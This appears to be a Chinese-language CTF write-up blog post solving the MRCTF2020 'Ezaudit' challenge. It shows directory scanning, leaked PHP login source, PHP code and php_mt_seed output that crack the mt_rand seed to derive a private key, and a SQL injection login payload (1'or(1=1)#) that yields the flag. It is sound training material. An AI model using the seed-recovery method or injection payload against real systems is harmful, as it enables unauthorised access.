[CTF]WriteUp第40篇
|
|
400
|
0
|
每日WriteUp

291 字
|
7 分钟

[MRCTF2020]Ezaudit

思路

没有任何东西,尝试扫描

[21:13:07] Starting:
[21:13:18] 200 -    1KB - /www.zip
[21:19:13] 301 -  185B  - /assets
[21:24:03] 301 -  185B  - /images
[21:25:26] 200 -  852B  - /login.html
[21:25:27] 200 -    3B  - /login.php

dirsearch扫描到www.zip,里面有index.php源码

<?php 
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
        }
    }
    }

} 
// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }

  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

解题

分析源码,其实要做的很简单,就是破解出mt_seed生成private_key,然后sql注入就行

生成private_key

我们首先通过给出的public_key反向推导出mt每次生成随机数的值和范围

<?php

// 已知Public_key,反向输出生成时mt_rand每次输出的随机数
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$length = strlen($Public_key);
$random_numbers = [];

for ($i = 0; $i < $length; $i++) {
    $char = $Public_key[$i];
    $pos = strpos($strings1, $char);
    $random_numbers[] = $pos;
    $random_numbers[] = $pos;
    $random_numbers[] = 0;
    $random_numbers[] = strlen($strings1) - 1;
}

$reversed_mt_rand_sequence = implode(' ', $random_numbers);
echo "Reversed mt_rand sequence: " . $reversed_mt_rand_sequence;
// 输出格式:4个一组
// [[值的下界, 值的上界], [随机数生成时的下界, 随机数生成时的上界]]
Reversed mt_rand sequence: 36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61

我们先找到seed,这里使用php_mt_seed

# ./php_mt_seed 36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61
Pattern: EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62
Version: 3.0.7 to 5.2.0
Found 0, trying 0xfc000000 - 0xffffffff, speed 694.2 Mseeds/s 
Version: 5.2.1+
Found 0, trying 0x68000000 - 0x69ffffff, speed 42.8 Mseeds/s 
seed = 0x69cf57fb = 1775196155 (PHP 5.2.1 to 7.0.x; HHVM)
Found 1, trying 0xfe000000 - 0xffffffff, speed 42.9 Mseeds/s 
Found 1

找到seed为1775196155
我们验证一下

<?php
$Public_key = "KVQP0LdJKRaV3n9D";
// 已知Public_key,反向输出生成时mt_rand每次输出的随机数
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$length = strlen($Public_key);
$seed_finded = 1775196155;
mt_srand($seed_finded);

// Attempt to regenerate the Public_key using the reversed mt_rand sequence
$generated_key = '';
for ($i = 0; $i < $length; $i++) {
    $rand_pos = mt_rand(0, strlen($strings1) - 1);  // Use mt_rand with the fixed seed
    $generated_key .= $strings1[$rand_pos];
}

echo "Generated Public Key: " . $generated_key;
Generated Public Key: KVQP0LdJKRaV3n9D

然后用这个mt_seed生成private_key

// 接在上面的代码下面
function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
}
$private_key = private_key();
echo "\nPrivate Key: " . $private_key;
Private Key: XuNhoueCDCGc

登录

我们到login.html登录

用户名 = 111
密码   = 1'or(1=1)#
私钥   = XuNhoueCDCGc

这里只要where条件永真就行

flag{7aba75a0-65f1-417c-a4ab-2e83571c6c65}

注意

要会mt_seed的破解
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
															
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
[CTF]WriteUp第55篇

							
							

							
[CTF]WriteUp第54篇

							
							

							
[CTF]WriteUp第53篇

							
							

							
[CTF]WriteUp第52篇

							
							

							
[CTF]WriteUp第51篇

							
							

							
[CTF]WriteUp第50篇

							
							

							
[CTF]WriteUp第49篇

							
							

							
[CTF]WriteUp第48篇

							
							

							
[CTF]WriteUp第47篇

							
							

							
[CTF]WriteUp第46篇